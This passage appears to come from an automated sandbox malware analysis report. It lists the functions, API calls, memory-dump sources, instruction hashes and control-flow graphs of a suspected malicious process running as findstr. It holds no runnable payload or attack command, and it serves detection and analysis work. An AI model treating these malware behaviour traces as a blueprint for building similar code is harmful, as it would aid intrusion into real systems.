                            • Opcode ID: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                            • Instruction ID: 1e0bd4d7de82a268bf2917782d7000a81e9c62c3bc133aeb5a6f5125b938f629
                            • Opcode Fuzzy Hash: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                            • Instruction Fuzzy Hash: 4C31CD72900348ABDB20DF60CC85FEF73BE9B45754F14455DBA08AB281DA71AA848BA4
                            Function 006E7DC0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 006E7EB3
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                            • Instruction ID: 461043d41571f4935da8928c1413dd96422002407d95f676e678d9f8342d08eb
                            • Opcode Fuzzy Hash: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                            • Instruction Fuzzy Hash: 6731C0B5A01649AFCB54DF99D881EEEB7B9AF8C314F10821DF918A3340D730A951CBA4
                            Function 006E7F20 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 006E7FF8
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                            • Instruction ID: 98b8b6009828563266f47ef268cd2a0b1e575fe9ff1a27e8fe7cfc3bf25bdc8f
                            • Opcode Fuzzy Hash: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                            • Instruction Fuzzy Hash: 5731D5B5A00248AFCB14DF99D881EEFB7B9EF8C314F10821DF908A7241D770A9118BA4
                            Function 006E8000 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                            • Instruction ID: e54c8be61c53b0a27f339caeeb30437e07d48a989ffdadb938609026d1883201
                            • Opcode Fuzzy Hash: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                            • Instruction Fuzzy Hash: 7D01C071641344BFD220EA6ADC46FEB73AEDF85714F00450DFA099B281D771BA1187E9
                            Function 006E8090 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 006E80C7
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction ID: e835abe737af81c89962f18f4df2e28d79ff0dd64274988baa4b3c147c80a9ec
                            • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction Fuzzy Hash: 2FE04F352002447BC210AA5ADC05FDB775EDFC6724F018419FA08A7242C671B91186B4
                            Function 02F84340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
                            • Instruction ID: 56bcd7924ae982e8643ff4ec87cb32f6f0c70b3d2ae8a4dc90e08c1565d0de90
                            • Opcode Fuzzy Hash: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
                            • Instruction Fuzzy Hash: 5290023160580022A54071588884547400597E1381B55C011E1428554C8A148A565365
                            Function 02F84650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c196f4e2247d69f1e5541cd04e0d608c842158411edee68835537d3400a77d4e
                            • Instruction ID: 62a95abb00f65d9cfdcfa30bcaa7427fa2b76cb5a1b5b910a9ce6853176f6e22
                            • Opcode Fuzzy Hash: c196f4e2247d69f1e5541cd04e0d608c842158411edee68835537d3400a77d4e
                            • Instruction Fuzzy Hash: 1590027160150052554071588804407600597E2381395C115A1558560C86188955926D
                            Function 02F835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8f3866d7d2d5adddc23304e41d23dc1c37c1f2959c8d028e1b4d278e550033cd
                            • Instruction ID: 3dd327ad592b836d216c5a0fea452bc21d166b5b609cb5d8f1eaa59314ee2e0d
                            • Opcode Fuzzy Hash: 8f3866d7d2d5adddc23304e41d23dc1c37c1f2959c8d028e1b4d278e550033cd
                            • Instruction Fuzzy Hash: BD90023160550412E50071588514707100587D1281F65C411A1428568D87958A5165A6
                            Function 02F82AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: a2236f30c62c5c342c3e190f95b8ba1c2ba3bc47b04383808c86aa9e7c46237c
                            • Instruction ID: 8fa30d3635d2e60158ec2115d03f3b5beea6ccb789a12e0fe90220b6b805938f
                            • Opcode Fuzzy Hash: a2236f30c62c5c342c3e190f95b8ba1c2ba3bc47b04383808c86aa9e7c46237c
                            • Instruction Fuzzy Hash: C7900235221400121545B558460450B044597D73D1395C015F241A590CC62189655325
                            Function 02F82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f6c28a91dad61b3496426aa5c80f94db943b773760cf8f8764e7ba4936dafbc2
                            • Instruction ID: a52c38fa43081937a0200087410daa295c704cb91e1ef2e3b412bafc2bbf7931
                            • Opcode Fuzzy Hash: f6c28a91dad61b3496426aa5c80f94db943b773760cf8f8764e7ba4936dafbc2
                            • Instruction Fuzzy Hash: 07900435311400131505F55C47045070047C7D73D1355C031F301D550CD731CD715135
                            Function 02F82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 643a7a2927d1050dee63ab14f5f85b2e1730f92671de4b89fbd41481c4eeae11
                            • Instruction ID: f86c6fab4291730f5d929ca763b5e0dd8e48add195239c54d7b82c93fd11edde
                            • Opcode Fuzzy Hash: 643a7a2927d1050dee63ab14f5f85b2e1730f92671de4b89fbd41481c4eeae11
                            • Instruction Fuzzy Hash: 5D90027120240013550571588414617400A87E1281B55C021E2018590DC52589916129
                            Function 02F839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f32eda923189980b889a70f7238b57048bcccece9d1b1423dc8337886c4d6d52
                            • Instruction ID: 442e0bbd2a9bd7153e96e4fa749f54a922f86fb774f7ef52b3bcf2a97fe7f51c
                            • Opcode Fuzzy Hash: f32eda923189980b889a70f7238b57048bcccece9d1b1423dc8337886c4d6d52
                            • Instruction Fuzzy Hash: E390023124545112E550715C84046174005A7E1281F55C021A1818594D855589556225
                            Function 02F82EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 366c6cad31ea51e14b442339d9d9e8319f863bf7a66d54d77bbfe1aae5363718
                            • Instruction ID: 0aa2f765e263a0110eabd6b1849606e817ca1085594a3fb9688024f81f60a784
                            • Opcode Fuzzy Hash: 366c6cad31ea51e14b442339d9d9e8319f863bf7a66d54d77bbfe1aae5363718
                            • Instruction Fuzzy Hash: DA90027120180413E54075588804607000587D1382F55C011A3068555E8A298D516139
                            Function 02F82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f48d624b08e57685211ea6cd6246e89bb46abfc15c24dbf7a0b7b599a3a8a2fe
                            • Instruction ID: 69dfb6445e2308ff69676f1b133ee80b118551ae81692f59810ec92939851762
                            • Opcode Fuzzy Hash: f48d624b08e57685211ea6cd6246e89bb46abfc15c24dbf7a0b7b599a3a8a2fe
                            • Instruction Fuzzy Hash: 78900231211C0052E60075688C14B07000587D1383F55C115A1158554CC91589615525
                            Function 02F82FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9791aa0262c8795fe9a5d37e3c6d3beca9c0818b528f250e56b68cc1dd22c813
                            • Instruction ID: 41a13684b65a71b9aace033068af485bccaeaec70ffd3854921ffcc6908ab60c
                            • Opcode Fuzzy Hash: 9791aa0262c8795fe9a5d37e3c6d3beca9c0818b528f250e56b68cc1dd22c813
                            • Instruction Fuzzy Hash: 019002316014005255407168C8449074005ABE2291755C121A199C550D855989655669
                            Function 02F82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2186f2dce08e26e0f9a0444911015d8d2463294a4040136e474761f031b376f3
                            • Instruction ID: 9657f942fd320a1779c8d27c4b73f5771c4e579612ec69a4189f2694d649075f
                            • Opcode Fuzzy Hash: 2186f2dce08e26e0f9a0444911015d8d2463294a4040136e474761f031b376f3
                            • Instruction Fuzzy Hash: 4590027134140452E50071588414B070005C7E2381F55C015E2068554D8619CD52612A
                            Function 02F82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: d6497c1d9251fc69c2ec74d89e4723cca48d12c186b14a860d3702f3812336e9
                            • Instruction ID: 0aa73acc21ce200ff7247b0f0a8898ef661d371a9ca9ab0f3684a3597e5f7064
                            • Opcode Fuzzy Hash: d6497c1d9251fc69c2ec74d89e4723cca48d12c186b14a860d3702f3812336e9
                            • Instruction Fuzzy Hash: 7690023120140412E50075989408647000587E1381F55D011A6028555EC66589916135
                            Function 02F82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 773feac4da1cf94cc9a9d6d5ab664da5ca9d2be6bacb40ab4cb52342ead821f1
                            • Instruction ID: fe541b76cf718b741c8e8717f9d1e7dde3d4b8e2d826e2ae9b789db012ca2412
                            • Opcode Fuzzy Hash: 773feac4da1cf94cc9a9d6d5ab664da5ca9d2be6bacb40ab4cb52342ead821f1
                            • Instruction Fuzzy Hash: CB90023120148812E5107158C40474B000587D1381F59C411A5428658D869589917125
                            Function 02F82C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 0075c2032f0aa0ca3c60e7e5105885060902b2ee8db41f3fbbd21317d57b5de3
                            • Instruction ID: b7cc1469ebd6718681c2d5853e209aab2647b0e8496895f8231fd4803bfea851
                            • Opcode Fuzzy Hash: 0075c2032f0aa0ca3c60e7e5105885060902b2ee8db41f3fbbd21317d57b5de3
                            • Instruction Fuzzy Hash: ED90023120140852E50071588404B47000587E1381F55C016A1128654D8615C9517525
                            Function 02F82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8bfa8adf393998e7a2fe4c3ae4b6a584564683bed18507ef2cc642119a5971af
                            • Instruction ID: d9adad21cd2a2b0640357f56779386a9e61f90b35537cf3d697565b1628afdfa
                            • Opcode Fuzzy Hash: 8bfa8adf393998e7a2fe4c3ae4b6a584564683bed18507ef2cc642119a5971af
                            • Instruction Fuzzy Hash: 3590023120140423E51171588504707000987D12C1F95C412A1428558D96568A52A125
                            Function 02F82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
                            • Instruction ID: cf8a82584ea20095192d8dbb446d445271d23390086302f5a58a82f7eeb96cb8
                            • Opcode Fuzzy Hash: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
                            • Instruction Fuzzy Hash: 9E900231242441626945B1588404507400697E12C1795C012A2418950C85269956D625
                            Function 02F82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
                            • Instruction ID: 05160477800016ea69983d1e37eb331c1f1ecc487d159a8ee14fa83699d1e997
                            • Opcode Fuzzy Hash: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
                            • Instruction Fuzzy Hash: 6690023130140013E540715894186074005D7E2381F55D011E1418554CD91589565226
                            Function 02F82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
                            • Instruction ID: 83ad994df1d576fbcd889b4595168b13d055329363f72550c2c0aafc0b53e923
                            • Opcode Fuzzy Hash: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
                            • Instruction Fuzzy Hash: 1790023921340012E5807158940860B000587D2282F95D415A1019558CC91589695325
                            Function 006D0B17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 342 6d0b17-6d0b1c 343 6d0b5e 342->343 344 6d0b1e-6d0b3b 342->344 345 6d0b3d-6d0b54 344->345 346 6d0ba8-6d0baf 344->346 345->343 347 6d0bb5-6d0bf7 call 6d4530 call 6c1410 call 6e1350 346->347 348 6d0bb0 call 6eaa10 346->348 355 6d0bf9-6d0c08 PostThreadMessageW 347->355 356 6d0c17-6d0c1d 347->356 348->347 355->356 357 6d0c0a-6d0c14 355->357 357->356
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 292bbe2a202938fa1994e3e652d79ce82b208cc1dc88c93a05ebdadae550f399
                            • Instruction ID: 0d41f1a0a468886cf059899c4fdd054b6591986708709ebfde99f8aa244eed32
                            • Opcode Fuzzy Hash: 292bbe2a202938fa1994e3e652d79ce82b208cc1dc88c93a05ebdadae550f399
                            • Instruction Fuzzy Hash: BC118C72D04258BBDB0297649C46EEFFF3DEF42310F0441AEF95067202E6364E1297A1
                            Function 006D0B56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 358 6d0b56-6d0b5c 359 6d0b5e 358->359 360 6d0b97-6d0bf7 call 6ea000 call 6eaa10 call 6d4530 call 6c1410 call 6e1350 358->360 371 6d0bf9-6d0c08 PostThreadMessageW 360->371 372 6d0c17-6d0c1d 360->372 371->372 373 6d0c0a-6d0c14 371->373 373->372
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 444b6107169246ffd9573908a4a1da656a9aeefd097e04328c094965c19b596c
                            • Instruction ID: 229e4ea7a50619b1171dab7320ab6dee879f5f35807f2d81e8f816a98aae5c80
                            • Opcode Fuzzy Hash: 444b6107169246ffd9573908a4a1da656a9aeefd097e04328c094965c19b596c
                            • Instruction Fuzzy Hash: B3014972D0120CBAEB119BD09C82EEFBB7DDF41794F008169FA04BB201E6355F0687A2
